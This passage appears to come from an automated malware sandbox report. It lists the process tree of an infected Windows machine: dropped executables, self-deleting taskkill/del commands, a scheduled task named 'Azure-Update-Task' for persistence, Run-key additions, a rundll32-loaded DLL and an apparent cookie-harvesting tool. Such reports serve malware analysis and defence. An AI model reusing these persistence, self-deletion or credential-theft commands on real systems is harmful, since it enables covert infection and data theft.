                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1536,9532356603829276264,15055980419016819521,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1532 /prefetch:2
                                                                                                                        9⤵
                                                                                                                          PID:4720
                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1536,9532356603829276264,15055980419016819521,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1852 /prefetch:8
                                                                                                                          9⤵
                                                                                                                            PID:5044
                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1536,9532356603829276264,15055980419016819521,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2188 /prefetch:8
                                                                                                                            9⤵
                                                                                                                              PID:652
                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1536,9532356603829276264,15055980419016819521,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2652 /prefetch:1
                                                                                                                              9⤵
                                                                                                                                PID:5180
                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1536,9532356603829276264,15055980419016819521,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2660 /prefetch:1
                                                                                                                                9⤵
                                                                                                                                  PID:5984
                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1536,9532356603829276264,15055980419016819521,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3444 /prefetch:1
                                                                                                                                  9⤵
                                                                                                                                    PID:6116
                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1536,9532356603829276264,15055980419016819521,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:1
                                                                                                                                    9⤵
                                                                                                                                      PID:1200
                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1536,9532356603829276264,15055980419016819521,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3652 /prefetch:1
                                                                                                                                      9⤵
                                                                                                                                        PID:504
                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1536,9532356603829276264,15055980419016819521,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3700 /prefetch:1
                                                                                                                                        9⤵
                                                                                                                                          PID:4168
                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1536,9532356603829276264,15055980419016819521,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4836 /prefetch:8
                                                                                                                                          9⤵
                                                                                                                                            PID:3588
                                                                                                                                          • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                                                                            "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                                                                                                            9⤵
                                                                                                                                              PID:4576
                                                                                                                                              • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                                                                                "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff72d43a890,0x7ff72d43a8a0,0x7ff72d43a8b0
                                                                                                                                                10⤵
                                                                                                                                                  PID:4792
                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1536,9532356603829276264,15055980419016819521,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5368 /prefetch:8
                                                                                                                                                9⤵
                                                                                                                                                  PID:4644
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1536,9532356603829276264,15055980419016819521,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5800 /prefetch:8
                                                                                                                                                  9⤵
                                                                                                                                                    PID:1184
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1536,9532356603829276264,15055980419016819521,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1060 /prefetch:8
                                                                                                                                                    9⤵
                                                                                                                                                      PID:4836
                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1536,9532356603829276264,15055980419016819521,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1496 /prefetch:2
                                                                                                                                                      9⤵
                                                                                                                                                        PID:2276
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "cmd.exe" /C taskkill /F /PID 4448 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\6s8FrBxuAv2X8XJRmm0yOsNq.exe"
                                                                                                                                                      8⤵
                                                                                                                                                        PID:4828
                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                          taskkill /F /PID 4448
                                                                                                                                                          9⤵
                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                          PID:4656
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        "cmd.exe" /C taskkill /F /PID 4448 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\6s8FrBxuAv2X8XJRmm0yOsNq.exe"
                                                                                                                                                        8⤵
                                                                                                                                                          PID:5524
                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                            taskkill /F /PID 4448
                                                                                                                                                            9⤵
                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                            PID:4604
                                                                                                                                                    • C:\Users\Admin\Documents\eioTAvl6PEKjgzBH169vzJK4.exe
                                                                                                                                                      "C:\Users\Admin\Documents\eioTAvl6PEKjgzBH169vzJK4.exe"
                                                                                                                                                      6⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:4756
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                        7⤵
                                                                                                                                                          PID:5140
                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                            taskkill /f /im chrome.exe
                                                                                                                                                            8⤵
                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                            PID:5424
                                                                                                                                                      • C:\Users\Admin\Documents\28A6cNdP6K1jxT08kjAyMBfi.exe
                                                                                                                                                        "C:\Users\Admin\Documents\28A6cNdP6K1jxT08kjAyMBfi.exe"
                                                                                                                                                        6⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:4788
                                                                                                                                                        • C:\Users\Admin\Documents\28A6cNdP6K1jxT08kjAyMBfi.exe
                                                                                                                                                          "C:\Users\Admin\Documents\28A6cNdP6K1jxT08kjAyMBfi.exe"
                                                                                                                                                          7⤵
                                                                                                                                                            PID:5756
                                                                                                                                                        • C:\Users\Admin\Documents\FNspY6q5uq3urYwUsbDlWE8N.exe
                                                                                                                                                          "C:\Users\Admin\Documents\FNspY6q5uq3urYwUsbDlWE8N.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:4584
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im FNspY6q5uq3urYwUsbDlWE8N.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\FNspY6q5uq3urYwUsbDlWE8N.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                            7⤵
                                                                                                                                                              PID:5648
                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                taskkill /im FNspY6q5uq3urYwUsbDlWE8N.exe /f
                                                                                                                                                                8⤵
                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                PID:5840
                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                timeout /t 6
                                                                                                                                                                8⤵
                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                PID:5712
                                                                                                                                                          • C:\Users\Admin\Documents\giFiXfYvlQwWSOt0HzHXLYAy.exe
                                                                                                                                                            "C:\Users\Admin\Documents\giFiXfYvlQwWSOt0HzHXLYAy.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:4500
                                                                                                                                                            • C:\Users\Admin\Documents\giFiXfYvlQwWSOt0HzHXLYAy.exe
                                                                                                                                                              C:\Users\Admin\Documents\giFiXfYvlQwWSOt0HzHXLYAy.exe
                                                                                                                                                              7⤵
                                                                                                                                                                PID:3004
                                                                                                                                                            • C:\Users\Admin\Documents\XaIoOBBoBw46vEJDaUId0k20.exe
                                                                                                                                                              "C:\Users\Admin\Documents\XaIoOBBoBw46vEJDaUId0k20.exe"
                                                                                                                                                              6⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:4508
                                                                                                                                                              • C:\Users\Admin\Documents\XaIoOBBoBw46vEJDaUId0k20.exe
                                                                                                                                                                C:\Users\Admin\Documents\XaIoOBBoBw46vEJDaUId0k20.exe
                                                                                                                                                                7⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                PID:3848
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                                                                          4⤵
                                                                                                                                                            PID:4040
                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 412 -s 528
                                                                                                                                                            4⤵
                                                                                                                                                            • Program crash
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            PID:2940
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                                                                            4⤵
                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                            PID:2152
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c sonia_4.exe
                                                                                                                                                            4⤵
                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                            PID:4072
                                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                                                                      1⤵
                                                                                                                                                        PID:1944
                                                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                                                        1⤵
                                                                                                                                                          PID:1340
                                                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                                                          1⤵
                                                                                                                                                            PID:1256
                                                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                                                            1⤵
                                                                                                                                                              PID:1152
                                                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                                              1⤵
                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                              PID:1036
                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:5900
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:5928
                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                        PID:4244
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\bcd1a49a-f655-41a0-8877-5139853b65c9\D4A5.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\bcd1a49a-f655-41a0-8877-5139853b65c9\D4A5.exe --Task
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:4008
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\bcd1a49a-f655-41a0-8877-5139853b65c9\D4A5.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\bcd1a49a-f655-41a0-8877-5139853b65c9\D4A5.exe --Task
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:5236
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:3232
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:5700
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\guidcgu
                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\guidcgu
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:6104
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\udidcgu
                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\udidcgu
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:5500
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\udidcgu
                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\udidcgu
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:3736
                                                                                                                                                                                • \??\c:\windows\system\svchost.exe
                                                                                                                                                                                  c:\windows\system\svchost.exe
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:5656
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\cfidcgu
                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\cfidcgu
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:4168
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\hsidcgu
                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\hsidcgu
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:4460
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\bcd1a49a-f655-41a0-8877-5139853b65c9\D4A5.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\bcd1a49a-f655-41a0-8877-5139853b65c9\D4A5.exe --Task
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:1076
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\bcd1a49a-f655-41a0-8877-5139853b65c9\D4A5.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\bcd1a49a-f655-41a0-8877-5139853b65c9\D4A5.exe --Task
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:6028
                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:5200
                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:5388
                                                                                                                                                                                              • \??\c:\windows\system\svchost.exe
                                                                                                                                                                                                c:\windows\system\svchost.exe
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:1160
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\bcd1a49a-f655-41a0-8877-5139853b65c9\D4A5.exe
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\bcd1a49a-f655-41a0-8877-5139853b65c9\D4A5.exe --Task
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:6016
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\bcd1a49a-f655-41a0-8877-5139853b65c9\D4A5.exe
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\bcd1a49a-f655-41a0-8877-5139853b65c9\D4A5.exe --Task
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:5704
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\guidcgu
                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\guidcgu
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:4980
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:5012
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:4284
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\cfidcgu
                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\cfidcgu
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:5468
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\hsidcgu
                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\hsidcgu
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:4204
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\bcd1a49a-f655-41a0-8877-5139853b65c9\D4A5.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\bcd1a49a-f655-41a0-8877-5139853b65c9\D4A5.exe --Task
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:1304
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\bcd1a49a-f655-41a0-8877-5139853b65c9\D4A5.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\bcd1a49a-f655-41a0-8877-5139853b65c9\D4A5.exe --Task
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:5664
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:5708
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:4860
                                                                                                                                                                                                                      • \??\c:\windows\system\svchost.exe
                                                                                                                                                                                                                        c:\windows\system\svchost.exe
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:2024
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\bcd1a49a-f655-41a0-8877-5139853b65c9\D4A5.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\bcd1a49a-f655-41a0-8877-5139853b65c9\D4A5.exe --Task
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:3320
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\bcd1a49a-f655-41a0-8877-5139853b65c9\D4A5.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\bcd1a49a-f655-41a0-8877-5139853b65c9\D4A5.exe --Task
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:3516
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:5728
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:5972
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:3992
                                                                                                                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:336
                                                                                                                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                    PID:748
                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                      PID:4380
                                                                                                                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                                                                      • Modifies registry class
                                                                                                                                                                                                                                      PID:1652
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0CAFA514\sonia_6.exe
                                                                                                                                                                                                                                    sonia_6.exe
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                    PID:1164
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      PID:4140
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                      PID:5064
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:1564
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                          PID:224
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0CAFA514\sonia_4.exe
                                                                                                                                                                                                                                        sonia_4.exe
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                        PID:3932
                                                                                                                                                                                                                                      • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                                                                        rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                        PID:4252
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                          PID:4284
                                                                                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:5568
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:504
                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
